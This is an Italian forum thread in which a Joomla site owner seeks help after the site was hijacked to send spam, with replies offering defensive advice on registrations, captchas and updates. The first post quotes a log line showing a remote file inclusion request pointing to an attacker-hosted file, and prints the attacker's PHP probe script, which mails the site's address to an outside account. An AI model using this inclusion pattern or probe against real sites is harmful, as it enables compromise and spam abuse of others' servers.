Hack su Joomla 1.0.15

[hs78]

Salve,
è quasi un mese ormai che il nostro sito Joomla 1.0.15 risulta invaso da attacchi di hackers. Tramite il nostro sito riescono ad inviare migliaia di email individuate dal provider.

Da un'analisi del log risulta che si sfrutta qualche bug del file index.php di Joomla...

89.108.67.143 - - [21/Aug/2008:23:17:00 +0200] "GET /index.php?x=http://www.nomesitohackers/filesource.txt?? HTTP/1.1" 403 1082 "-" "libwww-perl/5.812"

il filesource.txt (che risiede sul server degli hackers) è di questo tipo...

<?php
//=================================
//
//    scan inb0x hotmail v1.0
//
//  coded by FilhOte_Ccs and LOST
//      não rippem fdps :]
//
//
//      Hacker Group 2007
//=================================
//
 ini_set("max_execution_time",-1);
 set_time_limit(0);
 $user = @get_current_user();
 $email = "$user";
 $assunto = "Tome ai preto!";
 $email1 = "scytho@hotmail.com";
 $headers  = "From: <$email>rn";


 if(mail($email1, $assunto, $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], $headers)){
 echo "Opa, enviado!";
 exit();
 }
 else{
 echo "Não enviei..";
 exit();
 }
?>


p.s. Non ho indicato l'url preciso onde evitare di far reperire questo forum tramite ricerche su google


Grazie a tutti per qualsiasi tipo di suggerimento.

[fenisio]

caro amico, io ho subito lo stesso attacco. Sinceramente ho iniziato a vedere registrazioni con server e nomi strani pero' non gli ho dato peso; ieri mi ha contattato l'admin del server dicendo ceh hanno bloccato il mio sito perche' mandavano centinaia di mail al secondo. Adesso mi ritrovo col sito bloccato e lo sbloccheranno solo quando si capisce da dove sia dipeso.

Saluti, Fenisio.
P.S.spero che qualche admin di joomla ci dia la cura

la mia versione di joomla era aggiornata alla 1.5.6

[sali40]

Aspetta, fammi capire.
Tu probabilmente hai le registrazioni "aperte".
In ogni caso, vedi registrazioni "strane" e non dai peso?

Come fai a stupirti se usano il tuo sito come mezzo di spam?
Sinceramente non credo che ci possano essere patch che ti possano dire "questa registrazione strana è sospetta" - "questa registrazione strana è sicura".

Comincia a fare un "repulisti" degli utenti "strani".
Continua dando una occhiata ai componenti installati se, per caso, sono fra i componenti a rischio sicurezza.
Se hai un blog, o comunque qualche componente che consente commenti, tienili sotto controllo.
Inibisci la possiblità che ochi utente possa inviare email a suo piacimento.
Utilizza un capcha per evitare che le mail possano essere mandate tramite robots, se proprio devi lasciarle "aperte".
Tieni presente che la fuori c'è la guerra.
Non puoi pensare di fare il pacifista fiducioso

[fenisio]

Ciao Ssali40, ho cancellato tutti gli utenti che non anno mail attendibili, adesso sto aggiornando uddeIM1.1 alla uddeIM_1.3_hotfix1; ho scaricato questo capcha (anches e non ho ben capito cosa sia) com_securityimages5.0.0RC1 e poi Joomla_1.5.6-Stable-Full_PackageForSecurityImages5.0.0_v01.00.00. potresti dirmi se il componente security images è buono e non crei problemi?

grazie.

[sali40]

no, sinceramente non lo conosco.
Il capcha, comunque (anche security images lo è) consiste in quella immagine con caratteri e numeri su uno sfondo che faccia da disturbo il cui contenuto va copiato in un apposito campo.
Serve ad evitare la possibilità di forms compilati da robots.

Ma prima di tutto, attiva, quanto meno, l'opzione di attivazione con validazione delle email. Se poi sottoponessi la validazione alla necessità di approvazione da parte dell'amministratore sarebbe meglio

[fenisio]

azz....vero .
conosci percaso un componente dove contiene il capcha durante la registrazione? sinceramente il componente che sta su joomla 1.5 non è molto funzionale, ed anche il modulo del login.
Cmq ho installato SecurityImages e per fortuna avevo un backup del sito....avevo combinato un casino .

[sali40]

Security dovrebbe svolgere proprio questa funzione. Altrimenti, se usi CB mi pare abbia un plugin specifico